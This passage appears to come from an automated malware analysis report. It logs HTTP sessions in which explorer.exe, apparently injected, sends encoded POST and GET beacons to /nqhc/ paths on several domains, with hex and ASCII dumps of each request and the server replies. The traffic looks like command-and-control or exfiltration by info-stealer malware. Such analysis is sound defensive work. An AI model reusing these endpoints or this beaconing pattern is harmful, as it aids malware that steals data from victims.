5ykENQ5z4_VMCp4FrzmRb_wOIqUXgTX5Al4BGWayVHoYLt~WTT
                                                                                                                                                                          Dec 5, 2022 15:19:30.609488010 CET12648OUTData Raw: 30 44 65 51 50 59 62 4a 59 59 6d 66 44 6b 39 61 78 57 43 2d 71 65 67 41 35 4a 4b 58 35 4a 59 38 6c 53 70 32 6f 45 65 42 49 6b 6d 56 7e 4f 46 34 28 6c 6e 51 46 66 63 56 71 5a 6e 36 54 74 53 53 43 6f 75 75 42 74 59 37 44 35 47 61 41 6f 55 48 31 6d
                                                                                                                                                                          Data Ascii: 0DeQPYbJYYmfDk9axWC-qegA5JKX5JY8lSp2oEeBIkmV~OF4(lnQFfcVqZn6TtSSCouuBtY7D5GaAoUH1ms0C423D3P70IuMWadszTFHdBTx0K~fuD1Axb2L6mUaa1pLdEkGF01yWdxlilYIIQh2GmGvwXooxBcig_~9VWT25n~xwAKoCjZ4tWXVFcUquxt4F8rNcTLK~9lrWi(_YbBQITwaEz1BaB1p2wMZWRPFJP9FpvwfAu0
                                                                                                                                                                          Dec 5, 2022 15:19:30.637672901 CET12648INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:30 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                          Dec 5, 2022 15:19:30.637758017 CET12650OUTData Raw: 66 51 44 70 53 51 68 79 4e 51 5a 37 71 44 66 39 55 76 66 34 57 62 46 55 34 68 39 6c 52 38 54 55 73 41 34 39 7a 78 6e 4c 78 50 43 6a 37 69 47 54 59 70 77 43 4c 48 31 52 6b 39 72 4d 6e 41 37 61 34 36 79 4f 42 34 4c 46 51 4c 42 75 36 4f 70 66 48 72
                                                                                                                                                                          Data Ascii: fQDpSQhyNQZ7qDf9Uvf4WbFU4h9lR8TUsA49zxnLxPCj7iGTYpwCLH1Rk9rMnA7a46yOB4LFQLBu6OpfHroWILrGldM3y2LxFOhYjNfczvxtm9(wh6X838KKkhFnUynxIIjWKyYr5w19W7CkxzHBHPq_WQh7OBzfGs3GZTGDOK2iUzHRylxAHifkLpr1Qk3TKu2SfhAJy8hU4Ul69yPe0p1Ex-3oUKtjUBUsZy4DDlJaSd2Pv9T
                                                                                                                                                                          Dec 5, 2022 15:19:30.637824059 CET12651OUTData Raw: 47 47 54 55 50 31 52 4b 61 71 64 71 50 56 71 2d 70 54 46 71 61 31 73 53 65 5f 4b 6d 6c 2d 33 50 74 64 32 6a 39 6e 66 37 45 46 74 70 51 72 4b 61 30 6e 32 4d 7a 67 46 48 74 74 78 2d 57 50 64 62 36 34 6f 44 53 6d 62 38 7e 61 7a 72 36 76 71 50 5a 6b
                                                                                                                                                                          Data Ascii: GGTUP1RKaqdqPVq-pTFqa1sSe_Kml-3Ptd2j9nf7EFtpQrKa0n2MzgFHttx-WPdb64oDSmb8~azr6vqPZkCt4bFA5qb9pYH97oYHj_KpWJG7(xF2mCyHfdSYrogrZMNGwq9EzperLbiGZYdnmijsdMwole5WgleHZBSbWR8Ppn(ryuUf1hSDlAUHHKTKf84hGRxwkmY4mF(rz7pUwZfOXcQhzx2H8cZCnHH5~i6Q3-zGW-F8HEZ
                                                                                                                                                                          Dec 5, 2022 15:19:30.637952089 CET12657OUTData Raw: 75 62 41 49 4c 6b 68 6a 74 4e 45 4f 74 62 71 49 58 6a 30 76 28 76 46 4f 6b 39 39 72 72 50 78 47 38 54 46 32 41 50 47 79 52 57 34 30 78 5f 42 2d 78 66 39 67 34 32 4f 35 5a 48 45 6b 54 52 51 6b 6d 67 50 4a 32 36 46 6b 32 6a 72 77 55 69 68 47 6e 6b
                                                                                                                                                                          Data Ascii: ubAILkhjtNEOtbqIXj0v(vFOk99rrPxG8TF2APGyRW40x_B-xf9g42O5ZHEkTRQkmgPJ26Fk2jrwUihGnknZejQdiLQ-1Octd6BLSkuGjS8DHf3hYLEup9mLCnAOqOq7IvsB2So1Awf5BJ2RvQEhxthSHkZnKZkhIiF9fQQrr9FTq8htu7Mr5pSyjxd0QoaDJAULPdmHKr24NnGj5MGajKPJhP3VCHWWEENA7oeD7sP8R5Em560
                                                                                                                                                                          Dec 5, 2022 15:19:30.638123035 CET12661OUTData Raw: 4e 56 33 50 4a 48 31 73 78 6f 48 44 62 65 63 34 65 4b 54 4f 52 79 75 42 4f 4b 71 42 79 77 62 56 63 39 6d 59 35 75 70 4a 65 5f 72 47 35 58 6c 42 77 6f 28 46 5a 79 79 6b 33 6b 51 79 32 39 4d 65 39 4c 61 57 6b 30 37 4f 52 62 32 4d 50 77 51 39 34 42
                                                                                                                                                                          Data Ascii: NV3PJH1sxoHDbec4eKTORyuBOKqBywbVc9mY5upJe_rG5XlBwo(FZyyk3kQy29Me9LaWk07ORb2MPwQ94BH86evEHFjvxig_BYdOTmX9MmeR2BAVxmo6sbvBo8HqX9nSlDLB(opl7beX65WTSkUDDPATRKHzQoTwyJBOzdkW9uy0abxCpWyd(Sy_18NY5sUW8JqTnqp-71vKRXc9Cnl992PYIrErmE3rOFBrqpbIcdQkflKw~6y
                                                                                                                                                                          Dec 5, 2022 15:19:30.638283968 CET12666OUTData Raw: 6a 35 74 55 28 54 54 53 73 5f 72 4e 62 70 39 71 78 4b 47 45 53 68 57 2d 73 49 6e 75 38 70 78 5a 70 4b 76 54 31 6b 50 55 6b 63 57 74 73 6b 30 43 4f 67 34 6e 6b 35 77 2d 4f 54 4e 74 59 4d 5a 78 28 53 50 43 55 66 71 54 30 65 28 62 48 30 50 67 6f 66
                                                                                                                                                                          Data Ascii: j5tU(TTSs_rNbp9qxKGEShW-sInu8pxZpKvT1kPUkcWtsk0COg4nk5w-OTNtYMZx(SPCUfqT0e(bH0Pgof(hjms3iIJgph5w9D~_i11tF5wWxWVScQPsIuPqwcLV7Qo2S-N6gYtO4ORsZ-a3oHSgGTR3riqh5VAkWNDQrZyDHNK_L05I~AvUrhpMRcjsJxvR87ODI4u5~GoSHYOadj7zxkngehYF7L~LjphogbQb92CYmzeopo4
                                                                                                                                                                          Dec 5, 2022 15:19:30.638600111 CET12671OUTData Raw: 7a 74 6e 46 48 41 36 42 74 52 76 48 74 65 30 5a 6d 65 4f 79 64 52 62 4e 39 41 51 78 42 59 4c 43 49 78 73 74 67 7a 46 39 5a 74 39 59 76 64 53 78 59 2d 37 33 4d 77 57 67 28 46 61 55 36 4a 42 38 70 67 6d 53 56 34 6c 64 32 30 71 71 61 39 6f 61 64 59
                                                                                                                                                                          Data Ascii: ztnFHA6BtRvHte0ZmeOydRbN9AQxBYLCIxstgzF9Zt9YvdSxY-73MwWg(FaU6JB8pgmSV4ld20qqa9oadY(2Ohzq(c4LxtTIOeBQSqEE9Za2u5P3aQJLsU5GS2h4ZKp_Bg18pNGvd6Q9d6pk7N0G77sw46CUFNgcvyfTyW(3gXcUg8GsYm91YNRhE2bMsbVveCd6xgNVgMXrd-5yrOZCFztKNtcJkd1miUg09UTB6sDj(LfswNu
                                                                                                                                                                          Dec 5, 2022 15:19:30.666445971 CET12678OUTData Raw: 72 6c 74 33 59 78 63 35 62 39 72 6d 4b 61 69 57 62 31 47 67 73 58 78 71 4b 54 34 4e 71 74 49 70 71 4a 4b 6c 28 75 71 50 31 51 78 5a 49 77 46 64 6a 61 5a 43 28 34 71 31 32 53 65 53 6b 57 56 33 78 4a 72 47 35 64 59 35 6e 44 4b 62 5a 74 64 65 54 64
                                                                                                                                                                          Data Ascii: rlt3Yxc5b9rmKaiWb1GgsXxqKT4NqtIpqJKl(uqP1QxZIwFdjaZC(4q12SeSkWV3xJrG5dY5nDKbZtdeTd(Of9AuDOApsN(RofWXyhrVTvPHw4se(Jblp5ABrV(FcI(zJA6oQvK271X-iBjCziqCWvOwpB2urlZPBhuuP9ghmKjBr80awDGwS78hcdOqTRs9C3eJykbor4evWrYsymMgubQu3dX5r0mwVPE1hZ8M~y8xhkqxKza
                                                                                                                                                                          Dec 5, 2022 15:19:30.666549921 CET12688OUTData Raw: 78 47 78 70 70 73 47 32 61 6a 72 47 68 54 7e 34 65 64 56 4d 74 69 6c 2d 73 32 46 79 78 61 38 75 78 54 58 35 4e 51 58 39 4b 38 58 76 54 6f 49 58 64 57 64 4e 4f 6a 35 5a 38 72 65 77 6f 47 4c 5a 6b 55 49 58 79 4c 77 6c 41 75 68 7a 31 7a 43 33 49 5f
                                                                                                                                                                          Data Ascii: xGxppsG2ajrGhT~4edVMtil-s2Fyxa8uxTX5NQX9K8XvToIXdWdNOj5Z8rewoGLZkUIXyLwlAuhz1zC3I_RvPeF7lEDOTqW4VoW9VMlXghTtuLsYz2XMrS8IK0k3nDe3oqISKPv2emdZBQFa9TOptmiM7KrQmfKZRwUpdsdJIDrQK5G5GDCB(2zrnA0Jozyi3oBzvAig3JF15j5WSTYmUrUZ9OHCVcNVTVSApNzSPoL9ZoLjqQ7


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          79192.168.11.20499342.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:32.655055046 CET12689OUTGET /nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:19:32.682847977 CET12689INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:32 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          8192.168.11.2049843154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:15.589611053 CET11154OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.youlian.fund
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.youlian.fund
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 6e 34 57 6e 49 47 34 4a 6e 41 58 7a 31 77 35 44 51 34 6b 73 72 68 32 4d 43 38 48 4e 53 41 55 74 4e 70 4f 31 4d 52 4a 78 6c 72 45 43 5f 4d 46 62 35 41 6f 35 64 59 53 42 4b 4e 6a 46 79 71 6a 48 6b 4b 77 4a 43 32 59 34 4e 64 6e 35 36 78 6f 74 6c 72 47 4c 79 45 35 6a 78 46 58 62 52 58 44 39 65 4c 59 31 50 6d 41 45 71 4e 30 5a 38 36 43 72 72 43 42 63 74 28 67 64 2d 61 4e 56 33 76 6e 32 79 59 39 6a 74 44 6a 66 49 4b 70 4f 73 52 78 73 6e 31 4d 6a 6a 43 78 45 6b 54 58 43 44 34 52 31 35 51 32 78 4c 7e 79 6c 54 48 48 36 53 58 79 67 54 50 42 74 73 44 30 6e 4b 4a 77 70 57 74 70 54 6a 74 56 61 6d 7a 5a 54 78 39 51 4a 66 32 62 4c 6a 68 55 48 6b 56 45 71 66 35 5f 62 36 72 54 6e 41 33 35 53 73 34 4f 57 44 45 48 74 78 61 71 79 6e 73 75 7a 73 36 52 70 49 4b 58 4f 49 31 41 35 61 4f 69 75 48 54 32 68 57 52 66 70 68 54 75 4e 6f 33 44 71 43 5a 6f 49 56 6d 76 56 39 74 35 78 73 70 67 7a 65 46 33 73 39 50 6e 72 36 43 35 67 67 63 6a 32 48 34 4b 6a 78 33 48 66 51 63 6d 74 34 4e 76 31 72 49 77 79 42 33 36 32 42 31 4c 48 47 67 79 79 4f 62 55 31 35 51 61 77 43 74 4d 4f 63 4f 47 62 50 31 72 52 62 45 31 4f 52 48 5a 6b 63 54 4e 45 77 51 34 58 58 46 63 36 58 62 4c 7a 63 71 79 42 55 49 44 31 65 37 59 43 63 6c 54 28 53 4e 35 6b 34 66 56 37 73 4c 31 77 35 76 4e 54 35 6b 75 45 6e 37 4e 79 46 33 73 54 30 28 73 61 47 6c 66 62 33 72 62 4f 55 43 34 4b 44 35 77 35 51 58 74 34 77 49 69 43 44 31 72 76 74 67 69 79 50 51 68 54 39 75 6c 54 62 76 36 78 6b 43 6b 67 44 4a 30 62 42 41 6d 7a 44 77 54 56 51 6a 72 28 55 4a 6d 7e 33 51 75 67 77 55 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=BmG0s2zn5Xfmhn4WnIG4JnAXz1w5DQ4ksrh2MC8HNSAUtNpO1MRJxlrEC_MFb5Ao5dYSBKNjFyqjHkKwJC2Y4Ndn56xotlrGLyE5jxFXbRXD9eLY1PmAEqN0Z86CrrCBct(gd-aNV3vn2yY9jtDjfIKpOsRxsn1MjjCxEkTXCD4R15Q2xL~ylTHH6SXygTPBtsD0nKJwpWtpTjtVamzZTx9QJf2bLjhUHkVEqf5_b6rTnA35Ss4OWDEHtxaqynsuzs6RpIKXOI1A5aOiuHT2hWRfphTuNo3DqCZoIVmvV9t5xspgzeF3s9Pnr6C5ggcj2H4Kjx3HfQcmt4Nv1rIwyB362B1LHGgyyObU15QawCtMOcOGbP1rRbE1ORHZkcTNEwQ4XXFc6XbLzcqyBUID1e7YCclT(SN5k4fV7sL1w5vNT5kuEn7NyF3sT0(saGlfb3rbOUC4KD5w5QXt4wIiCD1rvtgiyPQhT9ulTbv6xkCkgDJ0bBAmzDwTVQjr(UJm~3QugwU.
                                                                                                                                                                          Dec 5, 2022 15:15:15.922270060 CET11154INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:15 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0
                                                                                                                                                                          Dec 5, 2022 15:15:16.168462038 CET11154INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          80192.168.11.2049935103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:37.939928055 CET12690OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.005404.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.005404.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 58 46 49 31 6d 47 77 6a 77 76 57 45 28 71 69 64 73 79 31 47 77 59 61 71 57 4a 6b 78 73 5a 77 6e 55 58 79 4b 71 4f 43 6e 46 72 4d 51 70 52 4d 57 57 7a 7a 6a 73 71 49 4b 55 5a 49 71 4d 6d 47 44 51 4e 78 79 6e 67 4b 50 28 51 57 6b 4a 62 63 4f 6e 7a 54 63 36 79 70 38 69 4e 46 35 36 59 35 4f 7e 78 7e 4d 45 54 6b 5a 4a 77 46 66 4e 2d 6b 48 4a 33 37 63 41 49 50 71 51 54 66 4a 70 39 53 71 7a 51 4f 4b 7a 34 30 5f 53 65 6c 32 41 42 6f 70 61 46 77 72 4b 42 50 33 4f 57 61 49 67 39 66 74 78 50 42 53 79 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=DwjUP3e1xl1YXFI1mGwjwvWE(qidsy1GwYaqWJkxsZwnUXyKqOCnFrMQpRMWWzzjsqIKUZIqMmGDQNxyngKP(QWkJbcOnzTc6yp8iNF56Y5O~x~METkZJwFfN-kHJ37cAIPqQTfJp9SqzQOKz40_Sel2ABopaFwrKBP3OWaIg9ftxPBSyQ).
                                                                                                                                                                          Dec 5, 2022 15:19:38.191865921 CET12691INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:38 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: W/"634bbb43-6cd"
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          81192.168.11.2049936103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:40.230209112 CET12693OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.005404.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.005404.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 56 6c 59 31 32 56 59 6a 79 50 57 48 36 71 69 64 6d 53 30 4e 77 59 57 71 57 4e 39 38 73 73 6f 6e 58 79 4f 4b 34 61 75 6e 45 72 4d 51 6e 78 4d 58 53 7a 79 68 73 71 31 71 55 63 6f 71 4d 6d 43 44 57 34 6c 79 77 67 4b 51 78 77 57 6e 66 72 63 4c 74 54 53 64 36 79 74 61 69 50 35 35 37 70 56 4f 28 7a 6d 4d 41 47 51 65 44 77 45 61 47 65 6b 41 48 58 37 53 41 49 79 66 51 58 54 7a 70 49 53 71 32 41 75 4b 68 49 30 38 59 75 6c 39 4e 68 70 4c 58 46 55 6e 4b 42 6e 4b 5a 6c 37 31 6b 2d 71 65 77 66 4d 4e 71 41 37 71 49 66 37 6c 39 39 4c 5f 68 50 68 30 4b 51 28 55 62 42 4f 6a 50 74 7a 76 5a 34 6d 42 55 48 49 54 68 36 38 72 50 68 59 4e 33 52 5a 78 54 6d 28 56 30 78 78 43 4f 35 41 56 4c 63 4b 79 70 33 4a 71 39 79 45 30 53 48 35 4e 43 4f 51 5f 61 69 34 38 56 4b 6d 4b 32 34 7e 6e 61 43 50 35 4b 57 55 52 74 35 66 43 4b 51 4d 2d 53 45 58 6a 35 72 33 4b 67 70 72 6c 55 66 28 45 66 36 45 5a 6e 70 6d 66 58 37 73 79 48 78 59 53 50 43 57 2d 51 58 46 73 36 38 72 47 79 62 68 43 72 6a 72 56 6a 4f 4b 63 49 4c 33 33 56 35 52 5a 74 50 39 72 4b 31 6e 50 50 32 69 49 79 61 72 6f 42 53 58 72 75 4d 4f 6a 66 42 73 56 4e 47 6a 43 6e 63 6e 61 31 72 45 6a 79 45 58 43 73 47 57 47 73 6d 74 36 38 58 63 56 30 63 4e 37 66 30 4c 75 50 52 62 66 38 58 35 65 51 45 69 6b 56 48 58 55 34 36 44 39 6d 4c 4a 4b 48 39 74 32 51 4e 6f 75 4c 46 41 6f 32 57 78 6f 66 46 47 6f 4f 5f 37 4b 45 32 41 73 30 66 67 58 34 33 6f 6f 4a 58 49 77 74 48 70 56 50 5f 59 32 46 6c 7a 71 59 49 45 76 6c 6b 36 73 47 31 30 46 43 76 5a 6c 79 41 63 49 4c 46 70 58 44 6c 74 47 32 37 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=DwjUP3e1xl1YVlY12VYjyPWH6qidmS0NwYWqWN98ssonXyOK4aunErMQnxMXSzyhsq1qUcoqMmCDW4lywgKQxwWnfrcLtTSd6ytaiP557pVO(zmMAGQeDwEaGekAHX7SAIyfQXTzpISq2AuKhI08Yul9NhpLXFUnKBnKZl71k-qewfMNqA7qIf7l99L_hPh0KQ(UbBOjPtzvZ4mBUHITh68rPhYN3RZxTm(V0xxCO5AVLcKyp3Jq9yE0SH5NCOQ_ai48VKmK24~naCP5KWURt5fCKQM-SEXj5r3KgprlUf(Ef6EZnpmfX7syHxYSPCW-QXFs68rGybhCrjrVjOKcIL33V5RZtP9rK1nPP2iIyaroBSXruMOjfBsVNGjCncna1rEjyEXCsGWGsmt68XcV0cN7f0LuPRbf8X5eQEikVHXU46D9mLJKH9t2QNouLFAo2WxofFGoO_7KE2As0fgX43ooJXIwtHpVP_Y2FlzqYIEvlk6sG10FCvZlyAcILFpXDltG27E.
                                                                                                                                                                          Dec 5, 2022 15:19:40.482784986 CET12694INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:40 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: W/"634bbb43-6cd"
